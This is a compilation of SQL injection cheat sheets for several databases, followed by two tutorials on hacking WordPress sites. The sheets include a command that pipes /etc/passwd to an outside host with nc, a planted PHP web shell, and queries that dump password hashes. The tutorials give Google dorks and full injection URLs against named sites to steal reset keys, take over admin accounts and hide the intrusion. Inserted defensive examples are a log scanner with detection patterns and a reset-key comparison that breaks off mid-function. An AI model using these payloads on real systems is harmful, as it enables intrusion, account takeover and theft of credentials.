  SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
  SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char
  SELECT substr('abcd', 3, 1); # returns c
Bitwise AND
  SELECT 6 & 2; # returns 2
  SELECT 6 & 1; # returns 0
ASCII Value -> Char
  SELECT char(65); # returns A
Char -> ASCII Value
  SELECT ascii('A'); # returns 65
Casting
  SELECT cast('1' AS unsigned integer);
  SELECT cast('123' AS char);
String Concatenation
  SELECT CONCAT('A', 'B'); # returns AB
  SELECT CONCAT('A', 'B', 'C'); # returns ABC
If Statement
  SELECT if(1=1, 'foo', 'bar'); -- returns 'foo'
Case Statement
  SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes
  SELECT 0x414243; # returns ABC
Time Delay
  SELECT BENCHMARK(1000000, MD5('A'));
  SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests
  Impossible?
Command Execution
  If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform.
Local File Access
  ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
  SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
Hostname, IP Address
  SELECT @@hostname;
Create Users
  CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
Delete Users
  DROP USER test1; -- priv
Make User DBA
  GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
Location of DB files
  SELECT @@datadir;
Default/System Databases
  information_schema (>= mysql 5.0)
  mysql
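The time-delay, out-of-band, command-execution and file-access entries in the Oracle, MSSQL and MySQL sheets above (and the pg_sleep/dblink entries of the Postgres sheet) are also what a defender looks for in web server logs. The following is an added example for this page, not code from the cheat sheets: it URL-decodes each request line (including double encoding), strips /**/ comment padding and reports which primitive class and backend a request matches. The log lines are constructed.

```python
"""Flag the DBMS-specific primitives from the cheat sheets in web server access logs.

Added example, not code from the original page. Each request is URL-decoded
until stable (catches %2520-style double encoding), /**/ comment padding is
removed, and the result is matched against one regex per cheat-sheet
primitive, tagged with its category and target backend. The combined-format
log lines at the bottom are constructed for the demonstration.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# (category, dbms, pattern): each pattern is one of the sheets' primitives.
SIGNATURES: List[Tuple[str, str, str]] = [
    ("time-delay",   "mssql",    r"waitfor\s+delay"),
    ("time-delay",   "mysql",    r"\b(?:sleep|benchmark)\s*\("),
    ("time-delay",   "postgres", r"\bpg_sleep\s*\("),
    ("time-delay",   "oracle",   r"dbms_lock\.sleep"),
    ("out-of-band",  "oracle",   r"utl_(?:inaddr|http)\."),
    ("out-of-band",  "mssql",    r"xp_(?:getfiledetails|fileexist)"),
    ("out-of-band",  "postgres", r"\bdblink\s*\("),
    ("command-exec", "mssql",    r"xp_cmdshell"),
    ("file-access",  "mysql",    r"\bload_file\s*\(|into\s+(?:dump|out)file"),
    ("file-access",  "mssql",    r"bulk\s+insert"),
    ("enumeration",  "oracle",   r"\b(?:all_tables|all_tab_columns|sys\.user\$|v\$version)"),
    ("enumeration",  "mssql",    r"master\.\.(?:syslogins|sysobjects|syscolumns|sysdatabases)"),
    ("enumeration",  "mysql",    r"information_schema\.|mysql\.user\b"),
    ("enumeration",  "postgres", r"\bpg_(?:user|shadow|database|class)\b"),
]
COMPILED = [(cat, db, re.compile(pat, re.I)) for cat, db, pat in SIGNATURES]

# Apache/nginx combined log format: client, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')


def normalize(request: str) -> str:
    """Decode until stable (handles double encoding), drop comment padding, lower-case."""
    text = request.replace("+", " ")
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)       # UNION/**/SELECT -> UNION SELECT
    return re.sub(r"\s+", " ", text).lower()


def classify(request: str) -> List[Tuple[str, str]]:
    """Return the (category, dbms) pairs whose primitive appears in the request."""
    text = normalize(request)
    return [(cat, db) for cat, db, rx in COMPILED if rx.search(text)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse combined-format lines; one finding per request that matched a signature."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("req"))
        if hits:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "request": m.group("req"), "hits": hits})
    return findings


# Constructed sample log lines (combined format); 10.0.0.5 is the probing client.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:01 +0000] "GET /item.php?id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "curl/7.3"',
    '10.0.0.5 - - [01/Jan/2014:10:00:02 +0000] "GET /item.asp?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 0 "-" "curl/7.3"',
    '10.0.0.5 - - [01/Jan/2014:10:00:03 +0000] "GET /item.asp?id=1;EXEC%2520xp_cmdshell%2520%2527dir%2527 HTTP/1.1" 500 0 "-" "curl/7.3"',
    '10.0.0.5 - - [01/Jan/2014:10:00:04 +0000] "GET /item.php?id=1%20UNION/**/SELECT%20LOAD_FILE(%27/etc/passwd%27) HTTP/1.1" 200 3100 "-" "curl/7.3"',
    '10.0.0.5 - - [01/Jan/2014:10:00:05 +0000] "GET /report?q=1%20AND%20UTL_INADDR.get_host_address(%27x.example%27)=1 HTTP/1.1" 200 88 "-" "curl/7.3"',
    '192.168.1.20 - - [01/Jan/2014:10:00:06 +0000] "GET /item.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["hits"], f["request"])
```

A 200 response to a SLEEP() or LOAD_FILE() probe, as opposed to the 500s on the MSSQL lines, is the case worth triaging first, since it suggests the injected statement executed.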
Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
Version: SELECT version()
Comments:
SELECT 1; -- comment
SELECT /*comment*/1;
Current User:
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users: SELECT usename FROM pg_user
List Password Hashes: SELECT usename, passwd FROM pg_shadow -- priv
Password Cracker: MDCrack can crack PostgreSQL's MD5-based passwords.
List Privileges: SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA Accounts: SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current Database: SELECT current_database()
List Databases: SELECT datname FROM pg_database
List Columns:
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
List Tables:
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog','pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
Find Tables From Column Name:
If you want to list all the table names that contain a column LIKE '%password%':
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
Select Nth Row:
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth Char: SELECT substr('abcd',3,1); -- returns c
Bitwise AND:
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0
ASCII Value -> Char: SELECT chr(65);
Char -> ASCII Value: SELECT ascii('A');
Casting:
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
String Concatenation: SELECT 'A'||'B'; -- returns AB
If Statement: IF statements only seem valid inside functions, so aren't much use for SQL injection. See CASE statement instead.
Case Statement: SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A
Avoiding Quotes: SELECT CHR(65)||CHR(66); -- returns AB
Time Delay:
SELECT pg_sleep(10); -- postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); -- priv, create your own sleep function. Taken from here.
Make DNS Requests:
Generally not possible in postgres. However, if contrib/dblink is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. "ping pentestmonkey.net".
Command Execution:
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user
Local File Access:
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by postgres OS-level user
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time ...
DROP TABLE mydata;
Write to a file:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as postgres OS-level user. Generally you won't be able to write to the web root, but it's always worth a try.
-- priv user can also read/write files by mapping libc functions
Hostname, IP Address:
SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
SELECT inet_server_port(); -- returns db server port (or null if using local connection)
Create Users:
CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time
Drop Users: DROP USER test1; -- priv
Make User DBA: ALTER USER test1 CREATEUSER CREATEDB; -- priv
Location of DB files:
SELECT current_setting('data_directory'); -- priv
SELECT current_setting('hba_file'); -- priv
Default/System Databases:
template0
template1
Ingres SQL Injection Cheat Sheet
Ingres seems to be one of the less common database backends for web applications, so I thought
it would be worth installing it and making some notes to make my next Ingres-based web app
test a little easier.
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres
download page is here.
This page will probably remain a work-in-progress for some time yet. I'll update it as I learn
more.
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Version: select dbmsinfo('_version');
Comments:
SELECT 123; -- comment
select 123; /* comment */
Current User:
select dbmsinfo('session_user');
select dbmsinfo('system_user');
List Users:
First connect to iidbdb, then:
SELECT name, password FROM iiuser; -- or
SELECT own FROM iidatabase;
Create Users: create user testuser with password='testuser'; -- priv
List Password Hashes:
First connect to iidbdb, then:
select name, password from iiuser;
List Privileges:
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
List DBA Accounts: TODO
Current Database: select dbmsinfo('database');
List Databases: SELECT name FROM iidatabase; -- connect to iidbdb
List Columns: select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables:
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';
Find Tables From Column Name: SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value'
Select Nth Row:
Astoundingly, this doesn't seem to be possible! This is as close as you can get:
select top 10 blah from table;
select first 10 blah from table;
Select Nth Char: select substr('abc',2,1); -- returns 'b'
Bitwise AND:
The function "bit_and" exists, but seems hard to use. Here's an example of ANDing 3 and 5 together. The result is a "byte" type with value ?01:
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
ASCII Value -> Char: TODO
Char -> ASCII Value: TODO (The "ascii" function exists, but doesn't seem to do what I'd expect.)
Casting:
select cast(123 as varchar);
select cast('123' as integer);
String Concatenation: select 'abc' || 'def';
If Statement: TODO
Case Statement: TODO
Avoiding Quotes: TODO
Time Delay: ??? See Heavy Queries article for some ideas.
Make DNS Requests: TODO
Command Execution: Impossible?
Local File Access: TODO
Hostname, IP Address: SELECT dbmsinfo('ima_server')
Location of DB files:
SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value' -- primary location of db
SELECT lname FROM iiextend WHERE dname = 'value' -- extended location of db
SELECT are FROM iilocations where lname = 'value' -- all area (i.e. directory) linked with a location
Default/System Databases: SELECT name FROM iidatabase WHERE own = '$ingres' -- connect to iidbdb
Installing Locally
The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be downloaded from http://www.vmware.com/appliances/directory/832
Database Client
TODO
There is a client called "sql" which can be used for local connections (at least) in the database server package above.
Logging in from command line
$ su - ingres
$ sql iidbdb
* select dbmsinfo('_version');\g
Identifying on the network
TODO
The following areas are interesting enough to include on this page, but I haven't researched them
for other databases:
Description / SQL / Comments
Batching Queries Allowed?: Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo=1; select ... doesn't matter, this is ignored.
FROM clause mandated in SELECTs?: No. You don't need to select from "dual" or anything. The following is legal:
select 1;
UNION supported: Yes. Nothing tricky here. The following is legal:
select 1 union select 2;
Enumerate Tables Privs: select table_name, permit_user, permit_type from iiaccess;
Length of a string: select length('abc'); -- returns 3
Roles and passwords:
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;
List Database Procedures:
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;
Create Users + Granting Privs:
First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;
DB2 SQL Injection Cheat Sheet
Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in
my experience. When you do find one, though, it pays to be prepared...
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on DB2 8.2 under Windows.
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.
Version: select versionnumber, version_timestamp from sysibm.sysversions;
Comments: select blah from foo; -- comment like this
Current User:
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users:
N/A (I think DB2 uses OS-level user accounts for authentication.) Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
List Password Hashes: N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges:
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH -- list db2 system privileges
List DBA Accounts: select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'
Current Database: select current server from sysibm.sysdummy1;
List Databases: SELECT schemaname FROM syscat.schemata;
List Columns: select name, tbname, coltype from sysibm.syscolumns;
List Tables: select name from sysibm.systables;
Find Tables From Column Name: select tbname from sysibm.syscolumns where name='username'
Select Nth Row: select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char: SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b
Bitwise AND: This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char: select chr(65) from sysibm.sysdummy1; -- returns 'A'
Char -> ASCII Value: select ascii('A') from sysibm.sysdummy1; -- returns 65
Casting:
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation:
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Informix SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Informix databases...
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for
Windows. The Informix download page is here.
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
 Oracle
 MSSQL
 MySQL
 PostgreSQL
 Ingres
 DB2
 Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Version:
SELECT DBINFO('version','full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','major'), DBINFO('version','minor'), DBINFO('version','level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version','os') FROM systables WHERE tabid = 1; -- T=Windows, U=32-bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit Unix
Comments: select 1 FROM systables WHERE tabid = 1; -- comment
Current User:
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Users: select username, usertype, password from sysusers;
List Password Hashes: TODO
List Privileges:
select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users
List DBA Accounts: TODO
Current Database: SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name
List Databases: select name, owner from sysdatabases;
List Columns: select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tables:
select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Procedures: select procname, owner FROM sysprocedures;
Find Tables From Column Name: select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';
Select Nth Row: select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row
Select Nth Char: SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C'
Bitwise AND:
select bitand(6,1) from systables where tabid = 1; -- returns 0
select bitand(6,2) from systables where tabid = 1; -- returns 2
ASCII Value -> Char: TODO
Char -> ASCII Value: select ascii('A') from systables where tabid = 1;
Casting:
select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
String Concatenation:
SELECT 'A'||'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A','B') FROM systables where tabid = 1; -- returns 'AB'
String Length: SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If Statement: TODO
Case Statement: select tabid, case when tabid > 10 then 'High' else 'Low' end from systables;
Avoiding Quotes: TODO
Time Delay: TODO
Make DNS Requests: TODO
Command Execution: TODO
Local File Access: TODO
Hostname, IP Address: SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname
Location of DB files: TODO
Default/System Databases:
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don't seem to contain anything / don't allow reading
Installing Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database Client
There's a database client SDK available, but I couldn't get the demo client working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers ("emerge dev-java/jdbc-informix" on Gentoo).
Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon:
 Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various environment variables set properly.
 Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.
The following were set on my test system. This may help if you get command line access but can't get a GUI. You'll need to change "testservername":
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
Identifying on the network
My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all
...
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
...
TODO How would we identify Informix listening on the network?
WordPress Hacking Tricks
I. Hacking WordPress (without cracking the hashes)
You cannot exploit the latest version of WordPress with this: 3.4.2, which was released on 6th September 2012.
Things you need:
1) Any WordPress SQLi dork (you can get it from exploit-db.com)
2) Knowledge of SQLi (because this thread is not about SQLi)
Let's start.
1) My dork
There are a number of SQLi exploits in different plugins and themes of WordPress. The exploit I'm
picking is in one of the plugins called Wp-FacebookConnect, and the Google dork for it is:
Code : inurl:"/?fbconnect_action=myhome"
Now paste this code in google.com (one of my best friends)
and you will see a number of vulnerable websites.
2) Now the website I'm going to use here is:
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
> Here the parameter userid is vulnerable to SQLi.
> So let's see what we can get from the database.
> I'm going to change the above URL to this:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)?,7,8,9,10,11,12+from+wp_users--
> Now you can see we got the username with the email id.
> Now if I change the above URL to this:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),?7,8,9,10,11,12+from+wp_users--
> I'm going to get the username and the hashed password.
> (Point to be noted here: I'm using concat here; you can also use group_concat to get all the users.
> Again, that would be your knowledge of how you use SQLi.)
> Now, we all know that WordPress hashes belong to the category MD5(wordpress) (different from simple MD5)
> and are very hard to crack.
> But if you're mad, you should think out of the box.
> So now follow the steps:
a) Go to the login page of the WordPress site. In my case that would be:
Code : http://masaru.ikeda.me/wp-login.php
b) Click on "Lost your password?"
c) Now WordPress will ask me for the username or email for which I want to reset the
password. In my case that is 'masaru', so go ahead and enter the username.
d) Now look closely: it says "Check your e-mail for the confirmation link."
e) Now what WordPress actually does is send an activation key to the email address of that user,
and it sets the value of the activation key in the database as well. What you have to do is just get
that key.
f) So now I'm going to change my URL to this, to get the activation key:
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa?tion_key),7,8,9,10,11,12+from+wp_users--
NOTE: We got the activation key here. You should note it down somewhere.
g) Now, finally, all we have to do is reset the password without going to the email address.
For that I'm going to add this to my URL:
Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
and I'm going to replace KEYHERE with the activation key I got, and USERNAME HERE with the
username, which in my case is 'masaru'. So my URL will be:
Code : http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
and VOILA, WordPress will ask you for your new password.
Now go to the login page again and try the new password, and there you go: you've got access to the
panel.
Now you know how to shell the WordPress site, don't you?
Trick for those who are actually MAD:
1) Now, to check quickly if a website is using the latest version 3.4.2 or a previous version:
> Go to the login page and see if there is an option there to go back to the main page of the
blog,
> like in my case the option "<- Back to Digital Way of Living". Then this is not 3.4.2.
> If you don't see this option, then it is 3.4.2. This trick is not legit; I figured it out and it is
working for me.
2) Once you have shelled the website:
> Get the database details.
> Use any database connector.
> Go to the table wp_user, and in the column wp_pass
> replace the hash with the one you got in the very beginning,
> the actual hash of the admin. Now the password will again be what it was before,
> as if nothing happened. Admin will never know what hit 'em.
Now, in the latest version, 3.4.2, what actually happens is that after confirming the activation
key WordPress doesn't let you choose a new password; rather, it actually sends you a random
password to your email.
How To Hack WordPress Websites using SQL Injection:
Tutorial: How To Hack WordPress Websites using SQL injection
What is WordPress?
WordPress is a free and open source blogging tool and a content management system (CMS) based on
PHP and MySQL. It has many features including a plug-in architecture and a template system. WordPress
is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003,
by founder Matt Mullenweg.
Now let's move on to hacking a website. I have used here the all-video-gallery (WordPress plugin) SQLi
vulnerability.
1> First we will find a target using a Google dork:
inurl:all-video-gallery/config.php?vid=
2> Open any website. In my case it's juangrial.com.
3> Now let's do a SQL injection. Copy the exploit code, then hit enter, then see the magic :)
Exploit code for finding username & password:
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
You can also try this. Both will work the same.
Exploit code for finding username & email:
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
4> We got the admin email. Now let's reset it.
For that go to: http://site.com/wp-admin or https://site.com/wp-login.php
Then click on "Lost Password".
5> Enter the email we got in the earlier steps.
6> Now come back and go to the activation table.
* Exploit code for the activation key:
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
7> Yeah! We got what we need. Now let's change the admin password.
Go to: http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8> Now open http://site.com/wp-admin
and log in with the new password xD
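Both WordPress tutorials above work for one reason: the key written into the user row is the same string the reset link carries, so anyone who can read that row (here, through the SQL injection) can finish the reset without ever seeing the e-mail. As an added example that is not code from the original page or from WordPress itself, the following compares that plaintext scheme with a store that keeps only a salted hash plus an expiry, and simulates an attacker who can dump the row; the class, column and user names are assumptions made for the demo.

```python
"""Password-reset keys: plaintext storage beside hashed, expiring storage.

Added example (not from the page or from WordPress). Row layouts, names and
the simulated "database read" are constructed for the demonstration.
"""
import hashlib
import hmac
import secrets
import time

RESET_TTL_SECONDS = 15 * 60  # how long a reset link stays valid (assumed)


class PlaintextResetStore:
    """Weak scheme: the usable key is stored as-is in the user row."""

    def __init__(self):
        self.rows = {}  # login -> {"activation_key": str}

    def request_reset(self, login, now=None):
        key = secrets.token_urlsafe(16)
        self.rows[login] = {"activation_key": key}
        return key  # this exact string goes into the e-mail link

    def verify(self, login, key, now=None):
        row = self.rows.get(login)
        # plain '==' compare, and the key never expires or gets consumed
        return row is not None and row["activation_key"] == key


class HashedResetStore:
    """Hardened scheme: the row holds only a salted hash and an expiry time."""

    def __init__(self):
        self.rows = {}  # login -> {"salt": bytes, "key_hash": bytes, "expires": float}

    @staticmethod
    def _digest(salt, key):
        return hashlib.sha256(salt + key.encode()).digest()

    def request_reset(self, login, now=None):
        now = time.time() if now is None else now
        key = secrets.token_urlsafe(16)
        salt = secrets.token_bytes(16)
        self.rows[login] = {
            "salt": salt,
            "key_hash": self._digest(salt, key),
            "expires": now + RESET_TTL_SECONDS,
        }
        return key  # the raw key exists only in the e-mail, never in the table

    def verify(self, login, key, now=None):
        now = time.time() if now is None else now
        row = self.rows.get(login)
        if row is None or now > row["expires"]:
            return False
        # constant-time compare so the check itself is not a timing oracle
        return hmac.compare_digest(row["key_hash"], self._digest(row["salt"], key))

    def consume(self, login):
        """A key must work once: drop the row after a successful reset."""
        self.rows.pop(login, None)


def attacker_with_db_read(store, login, now=None):
    """What someone who can dump the user row (e.g. via SQLi) can do with it."""
    row = store.rows[login]
    if "activation_key" in row:
        # plaintext scheme: the dumped value *is* the reset key
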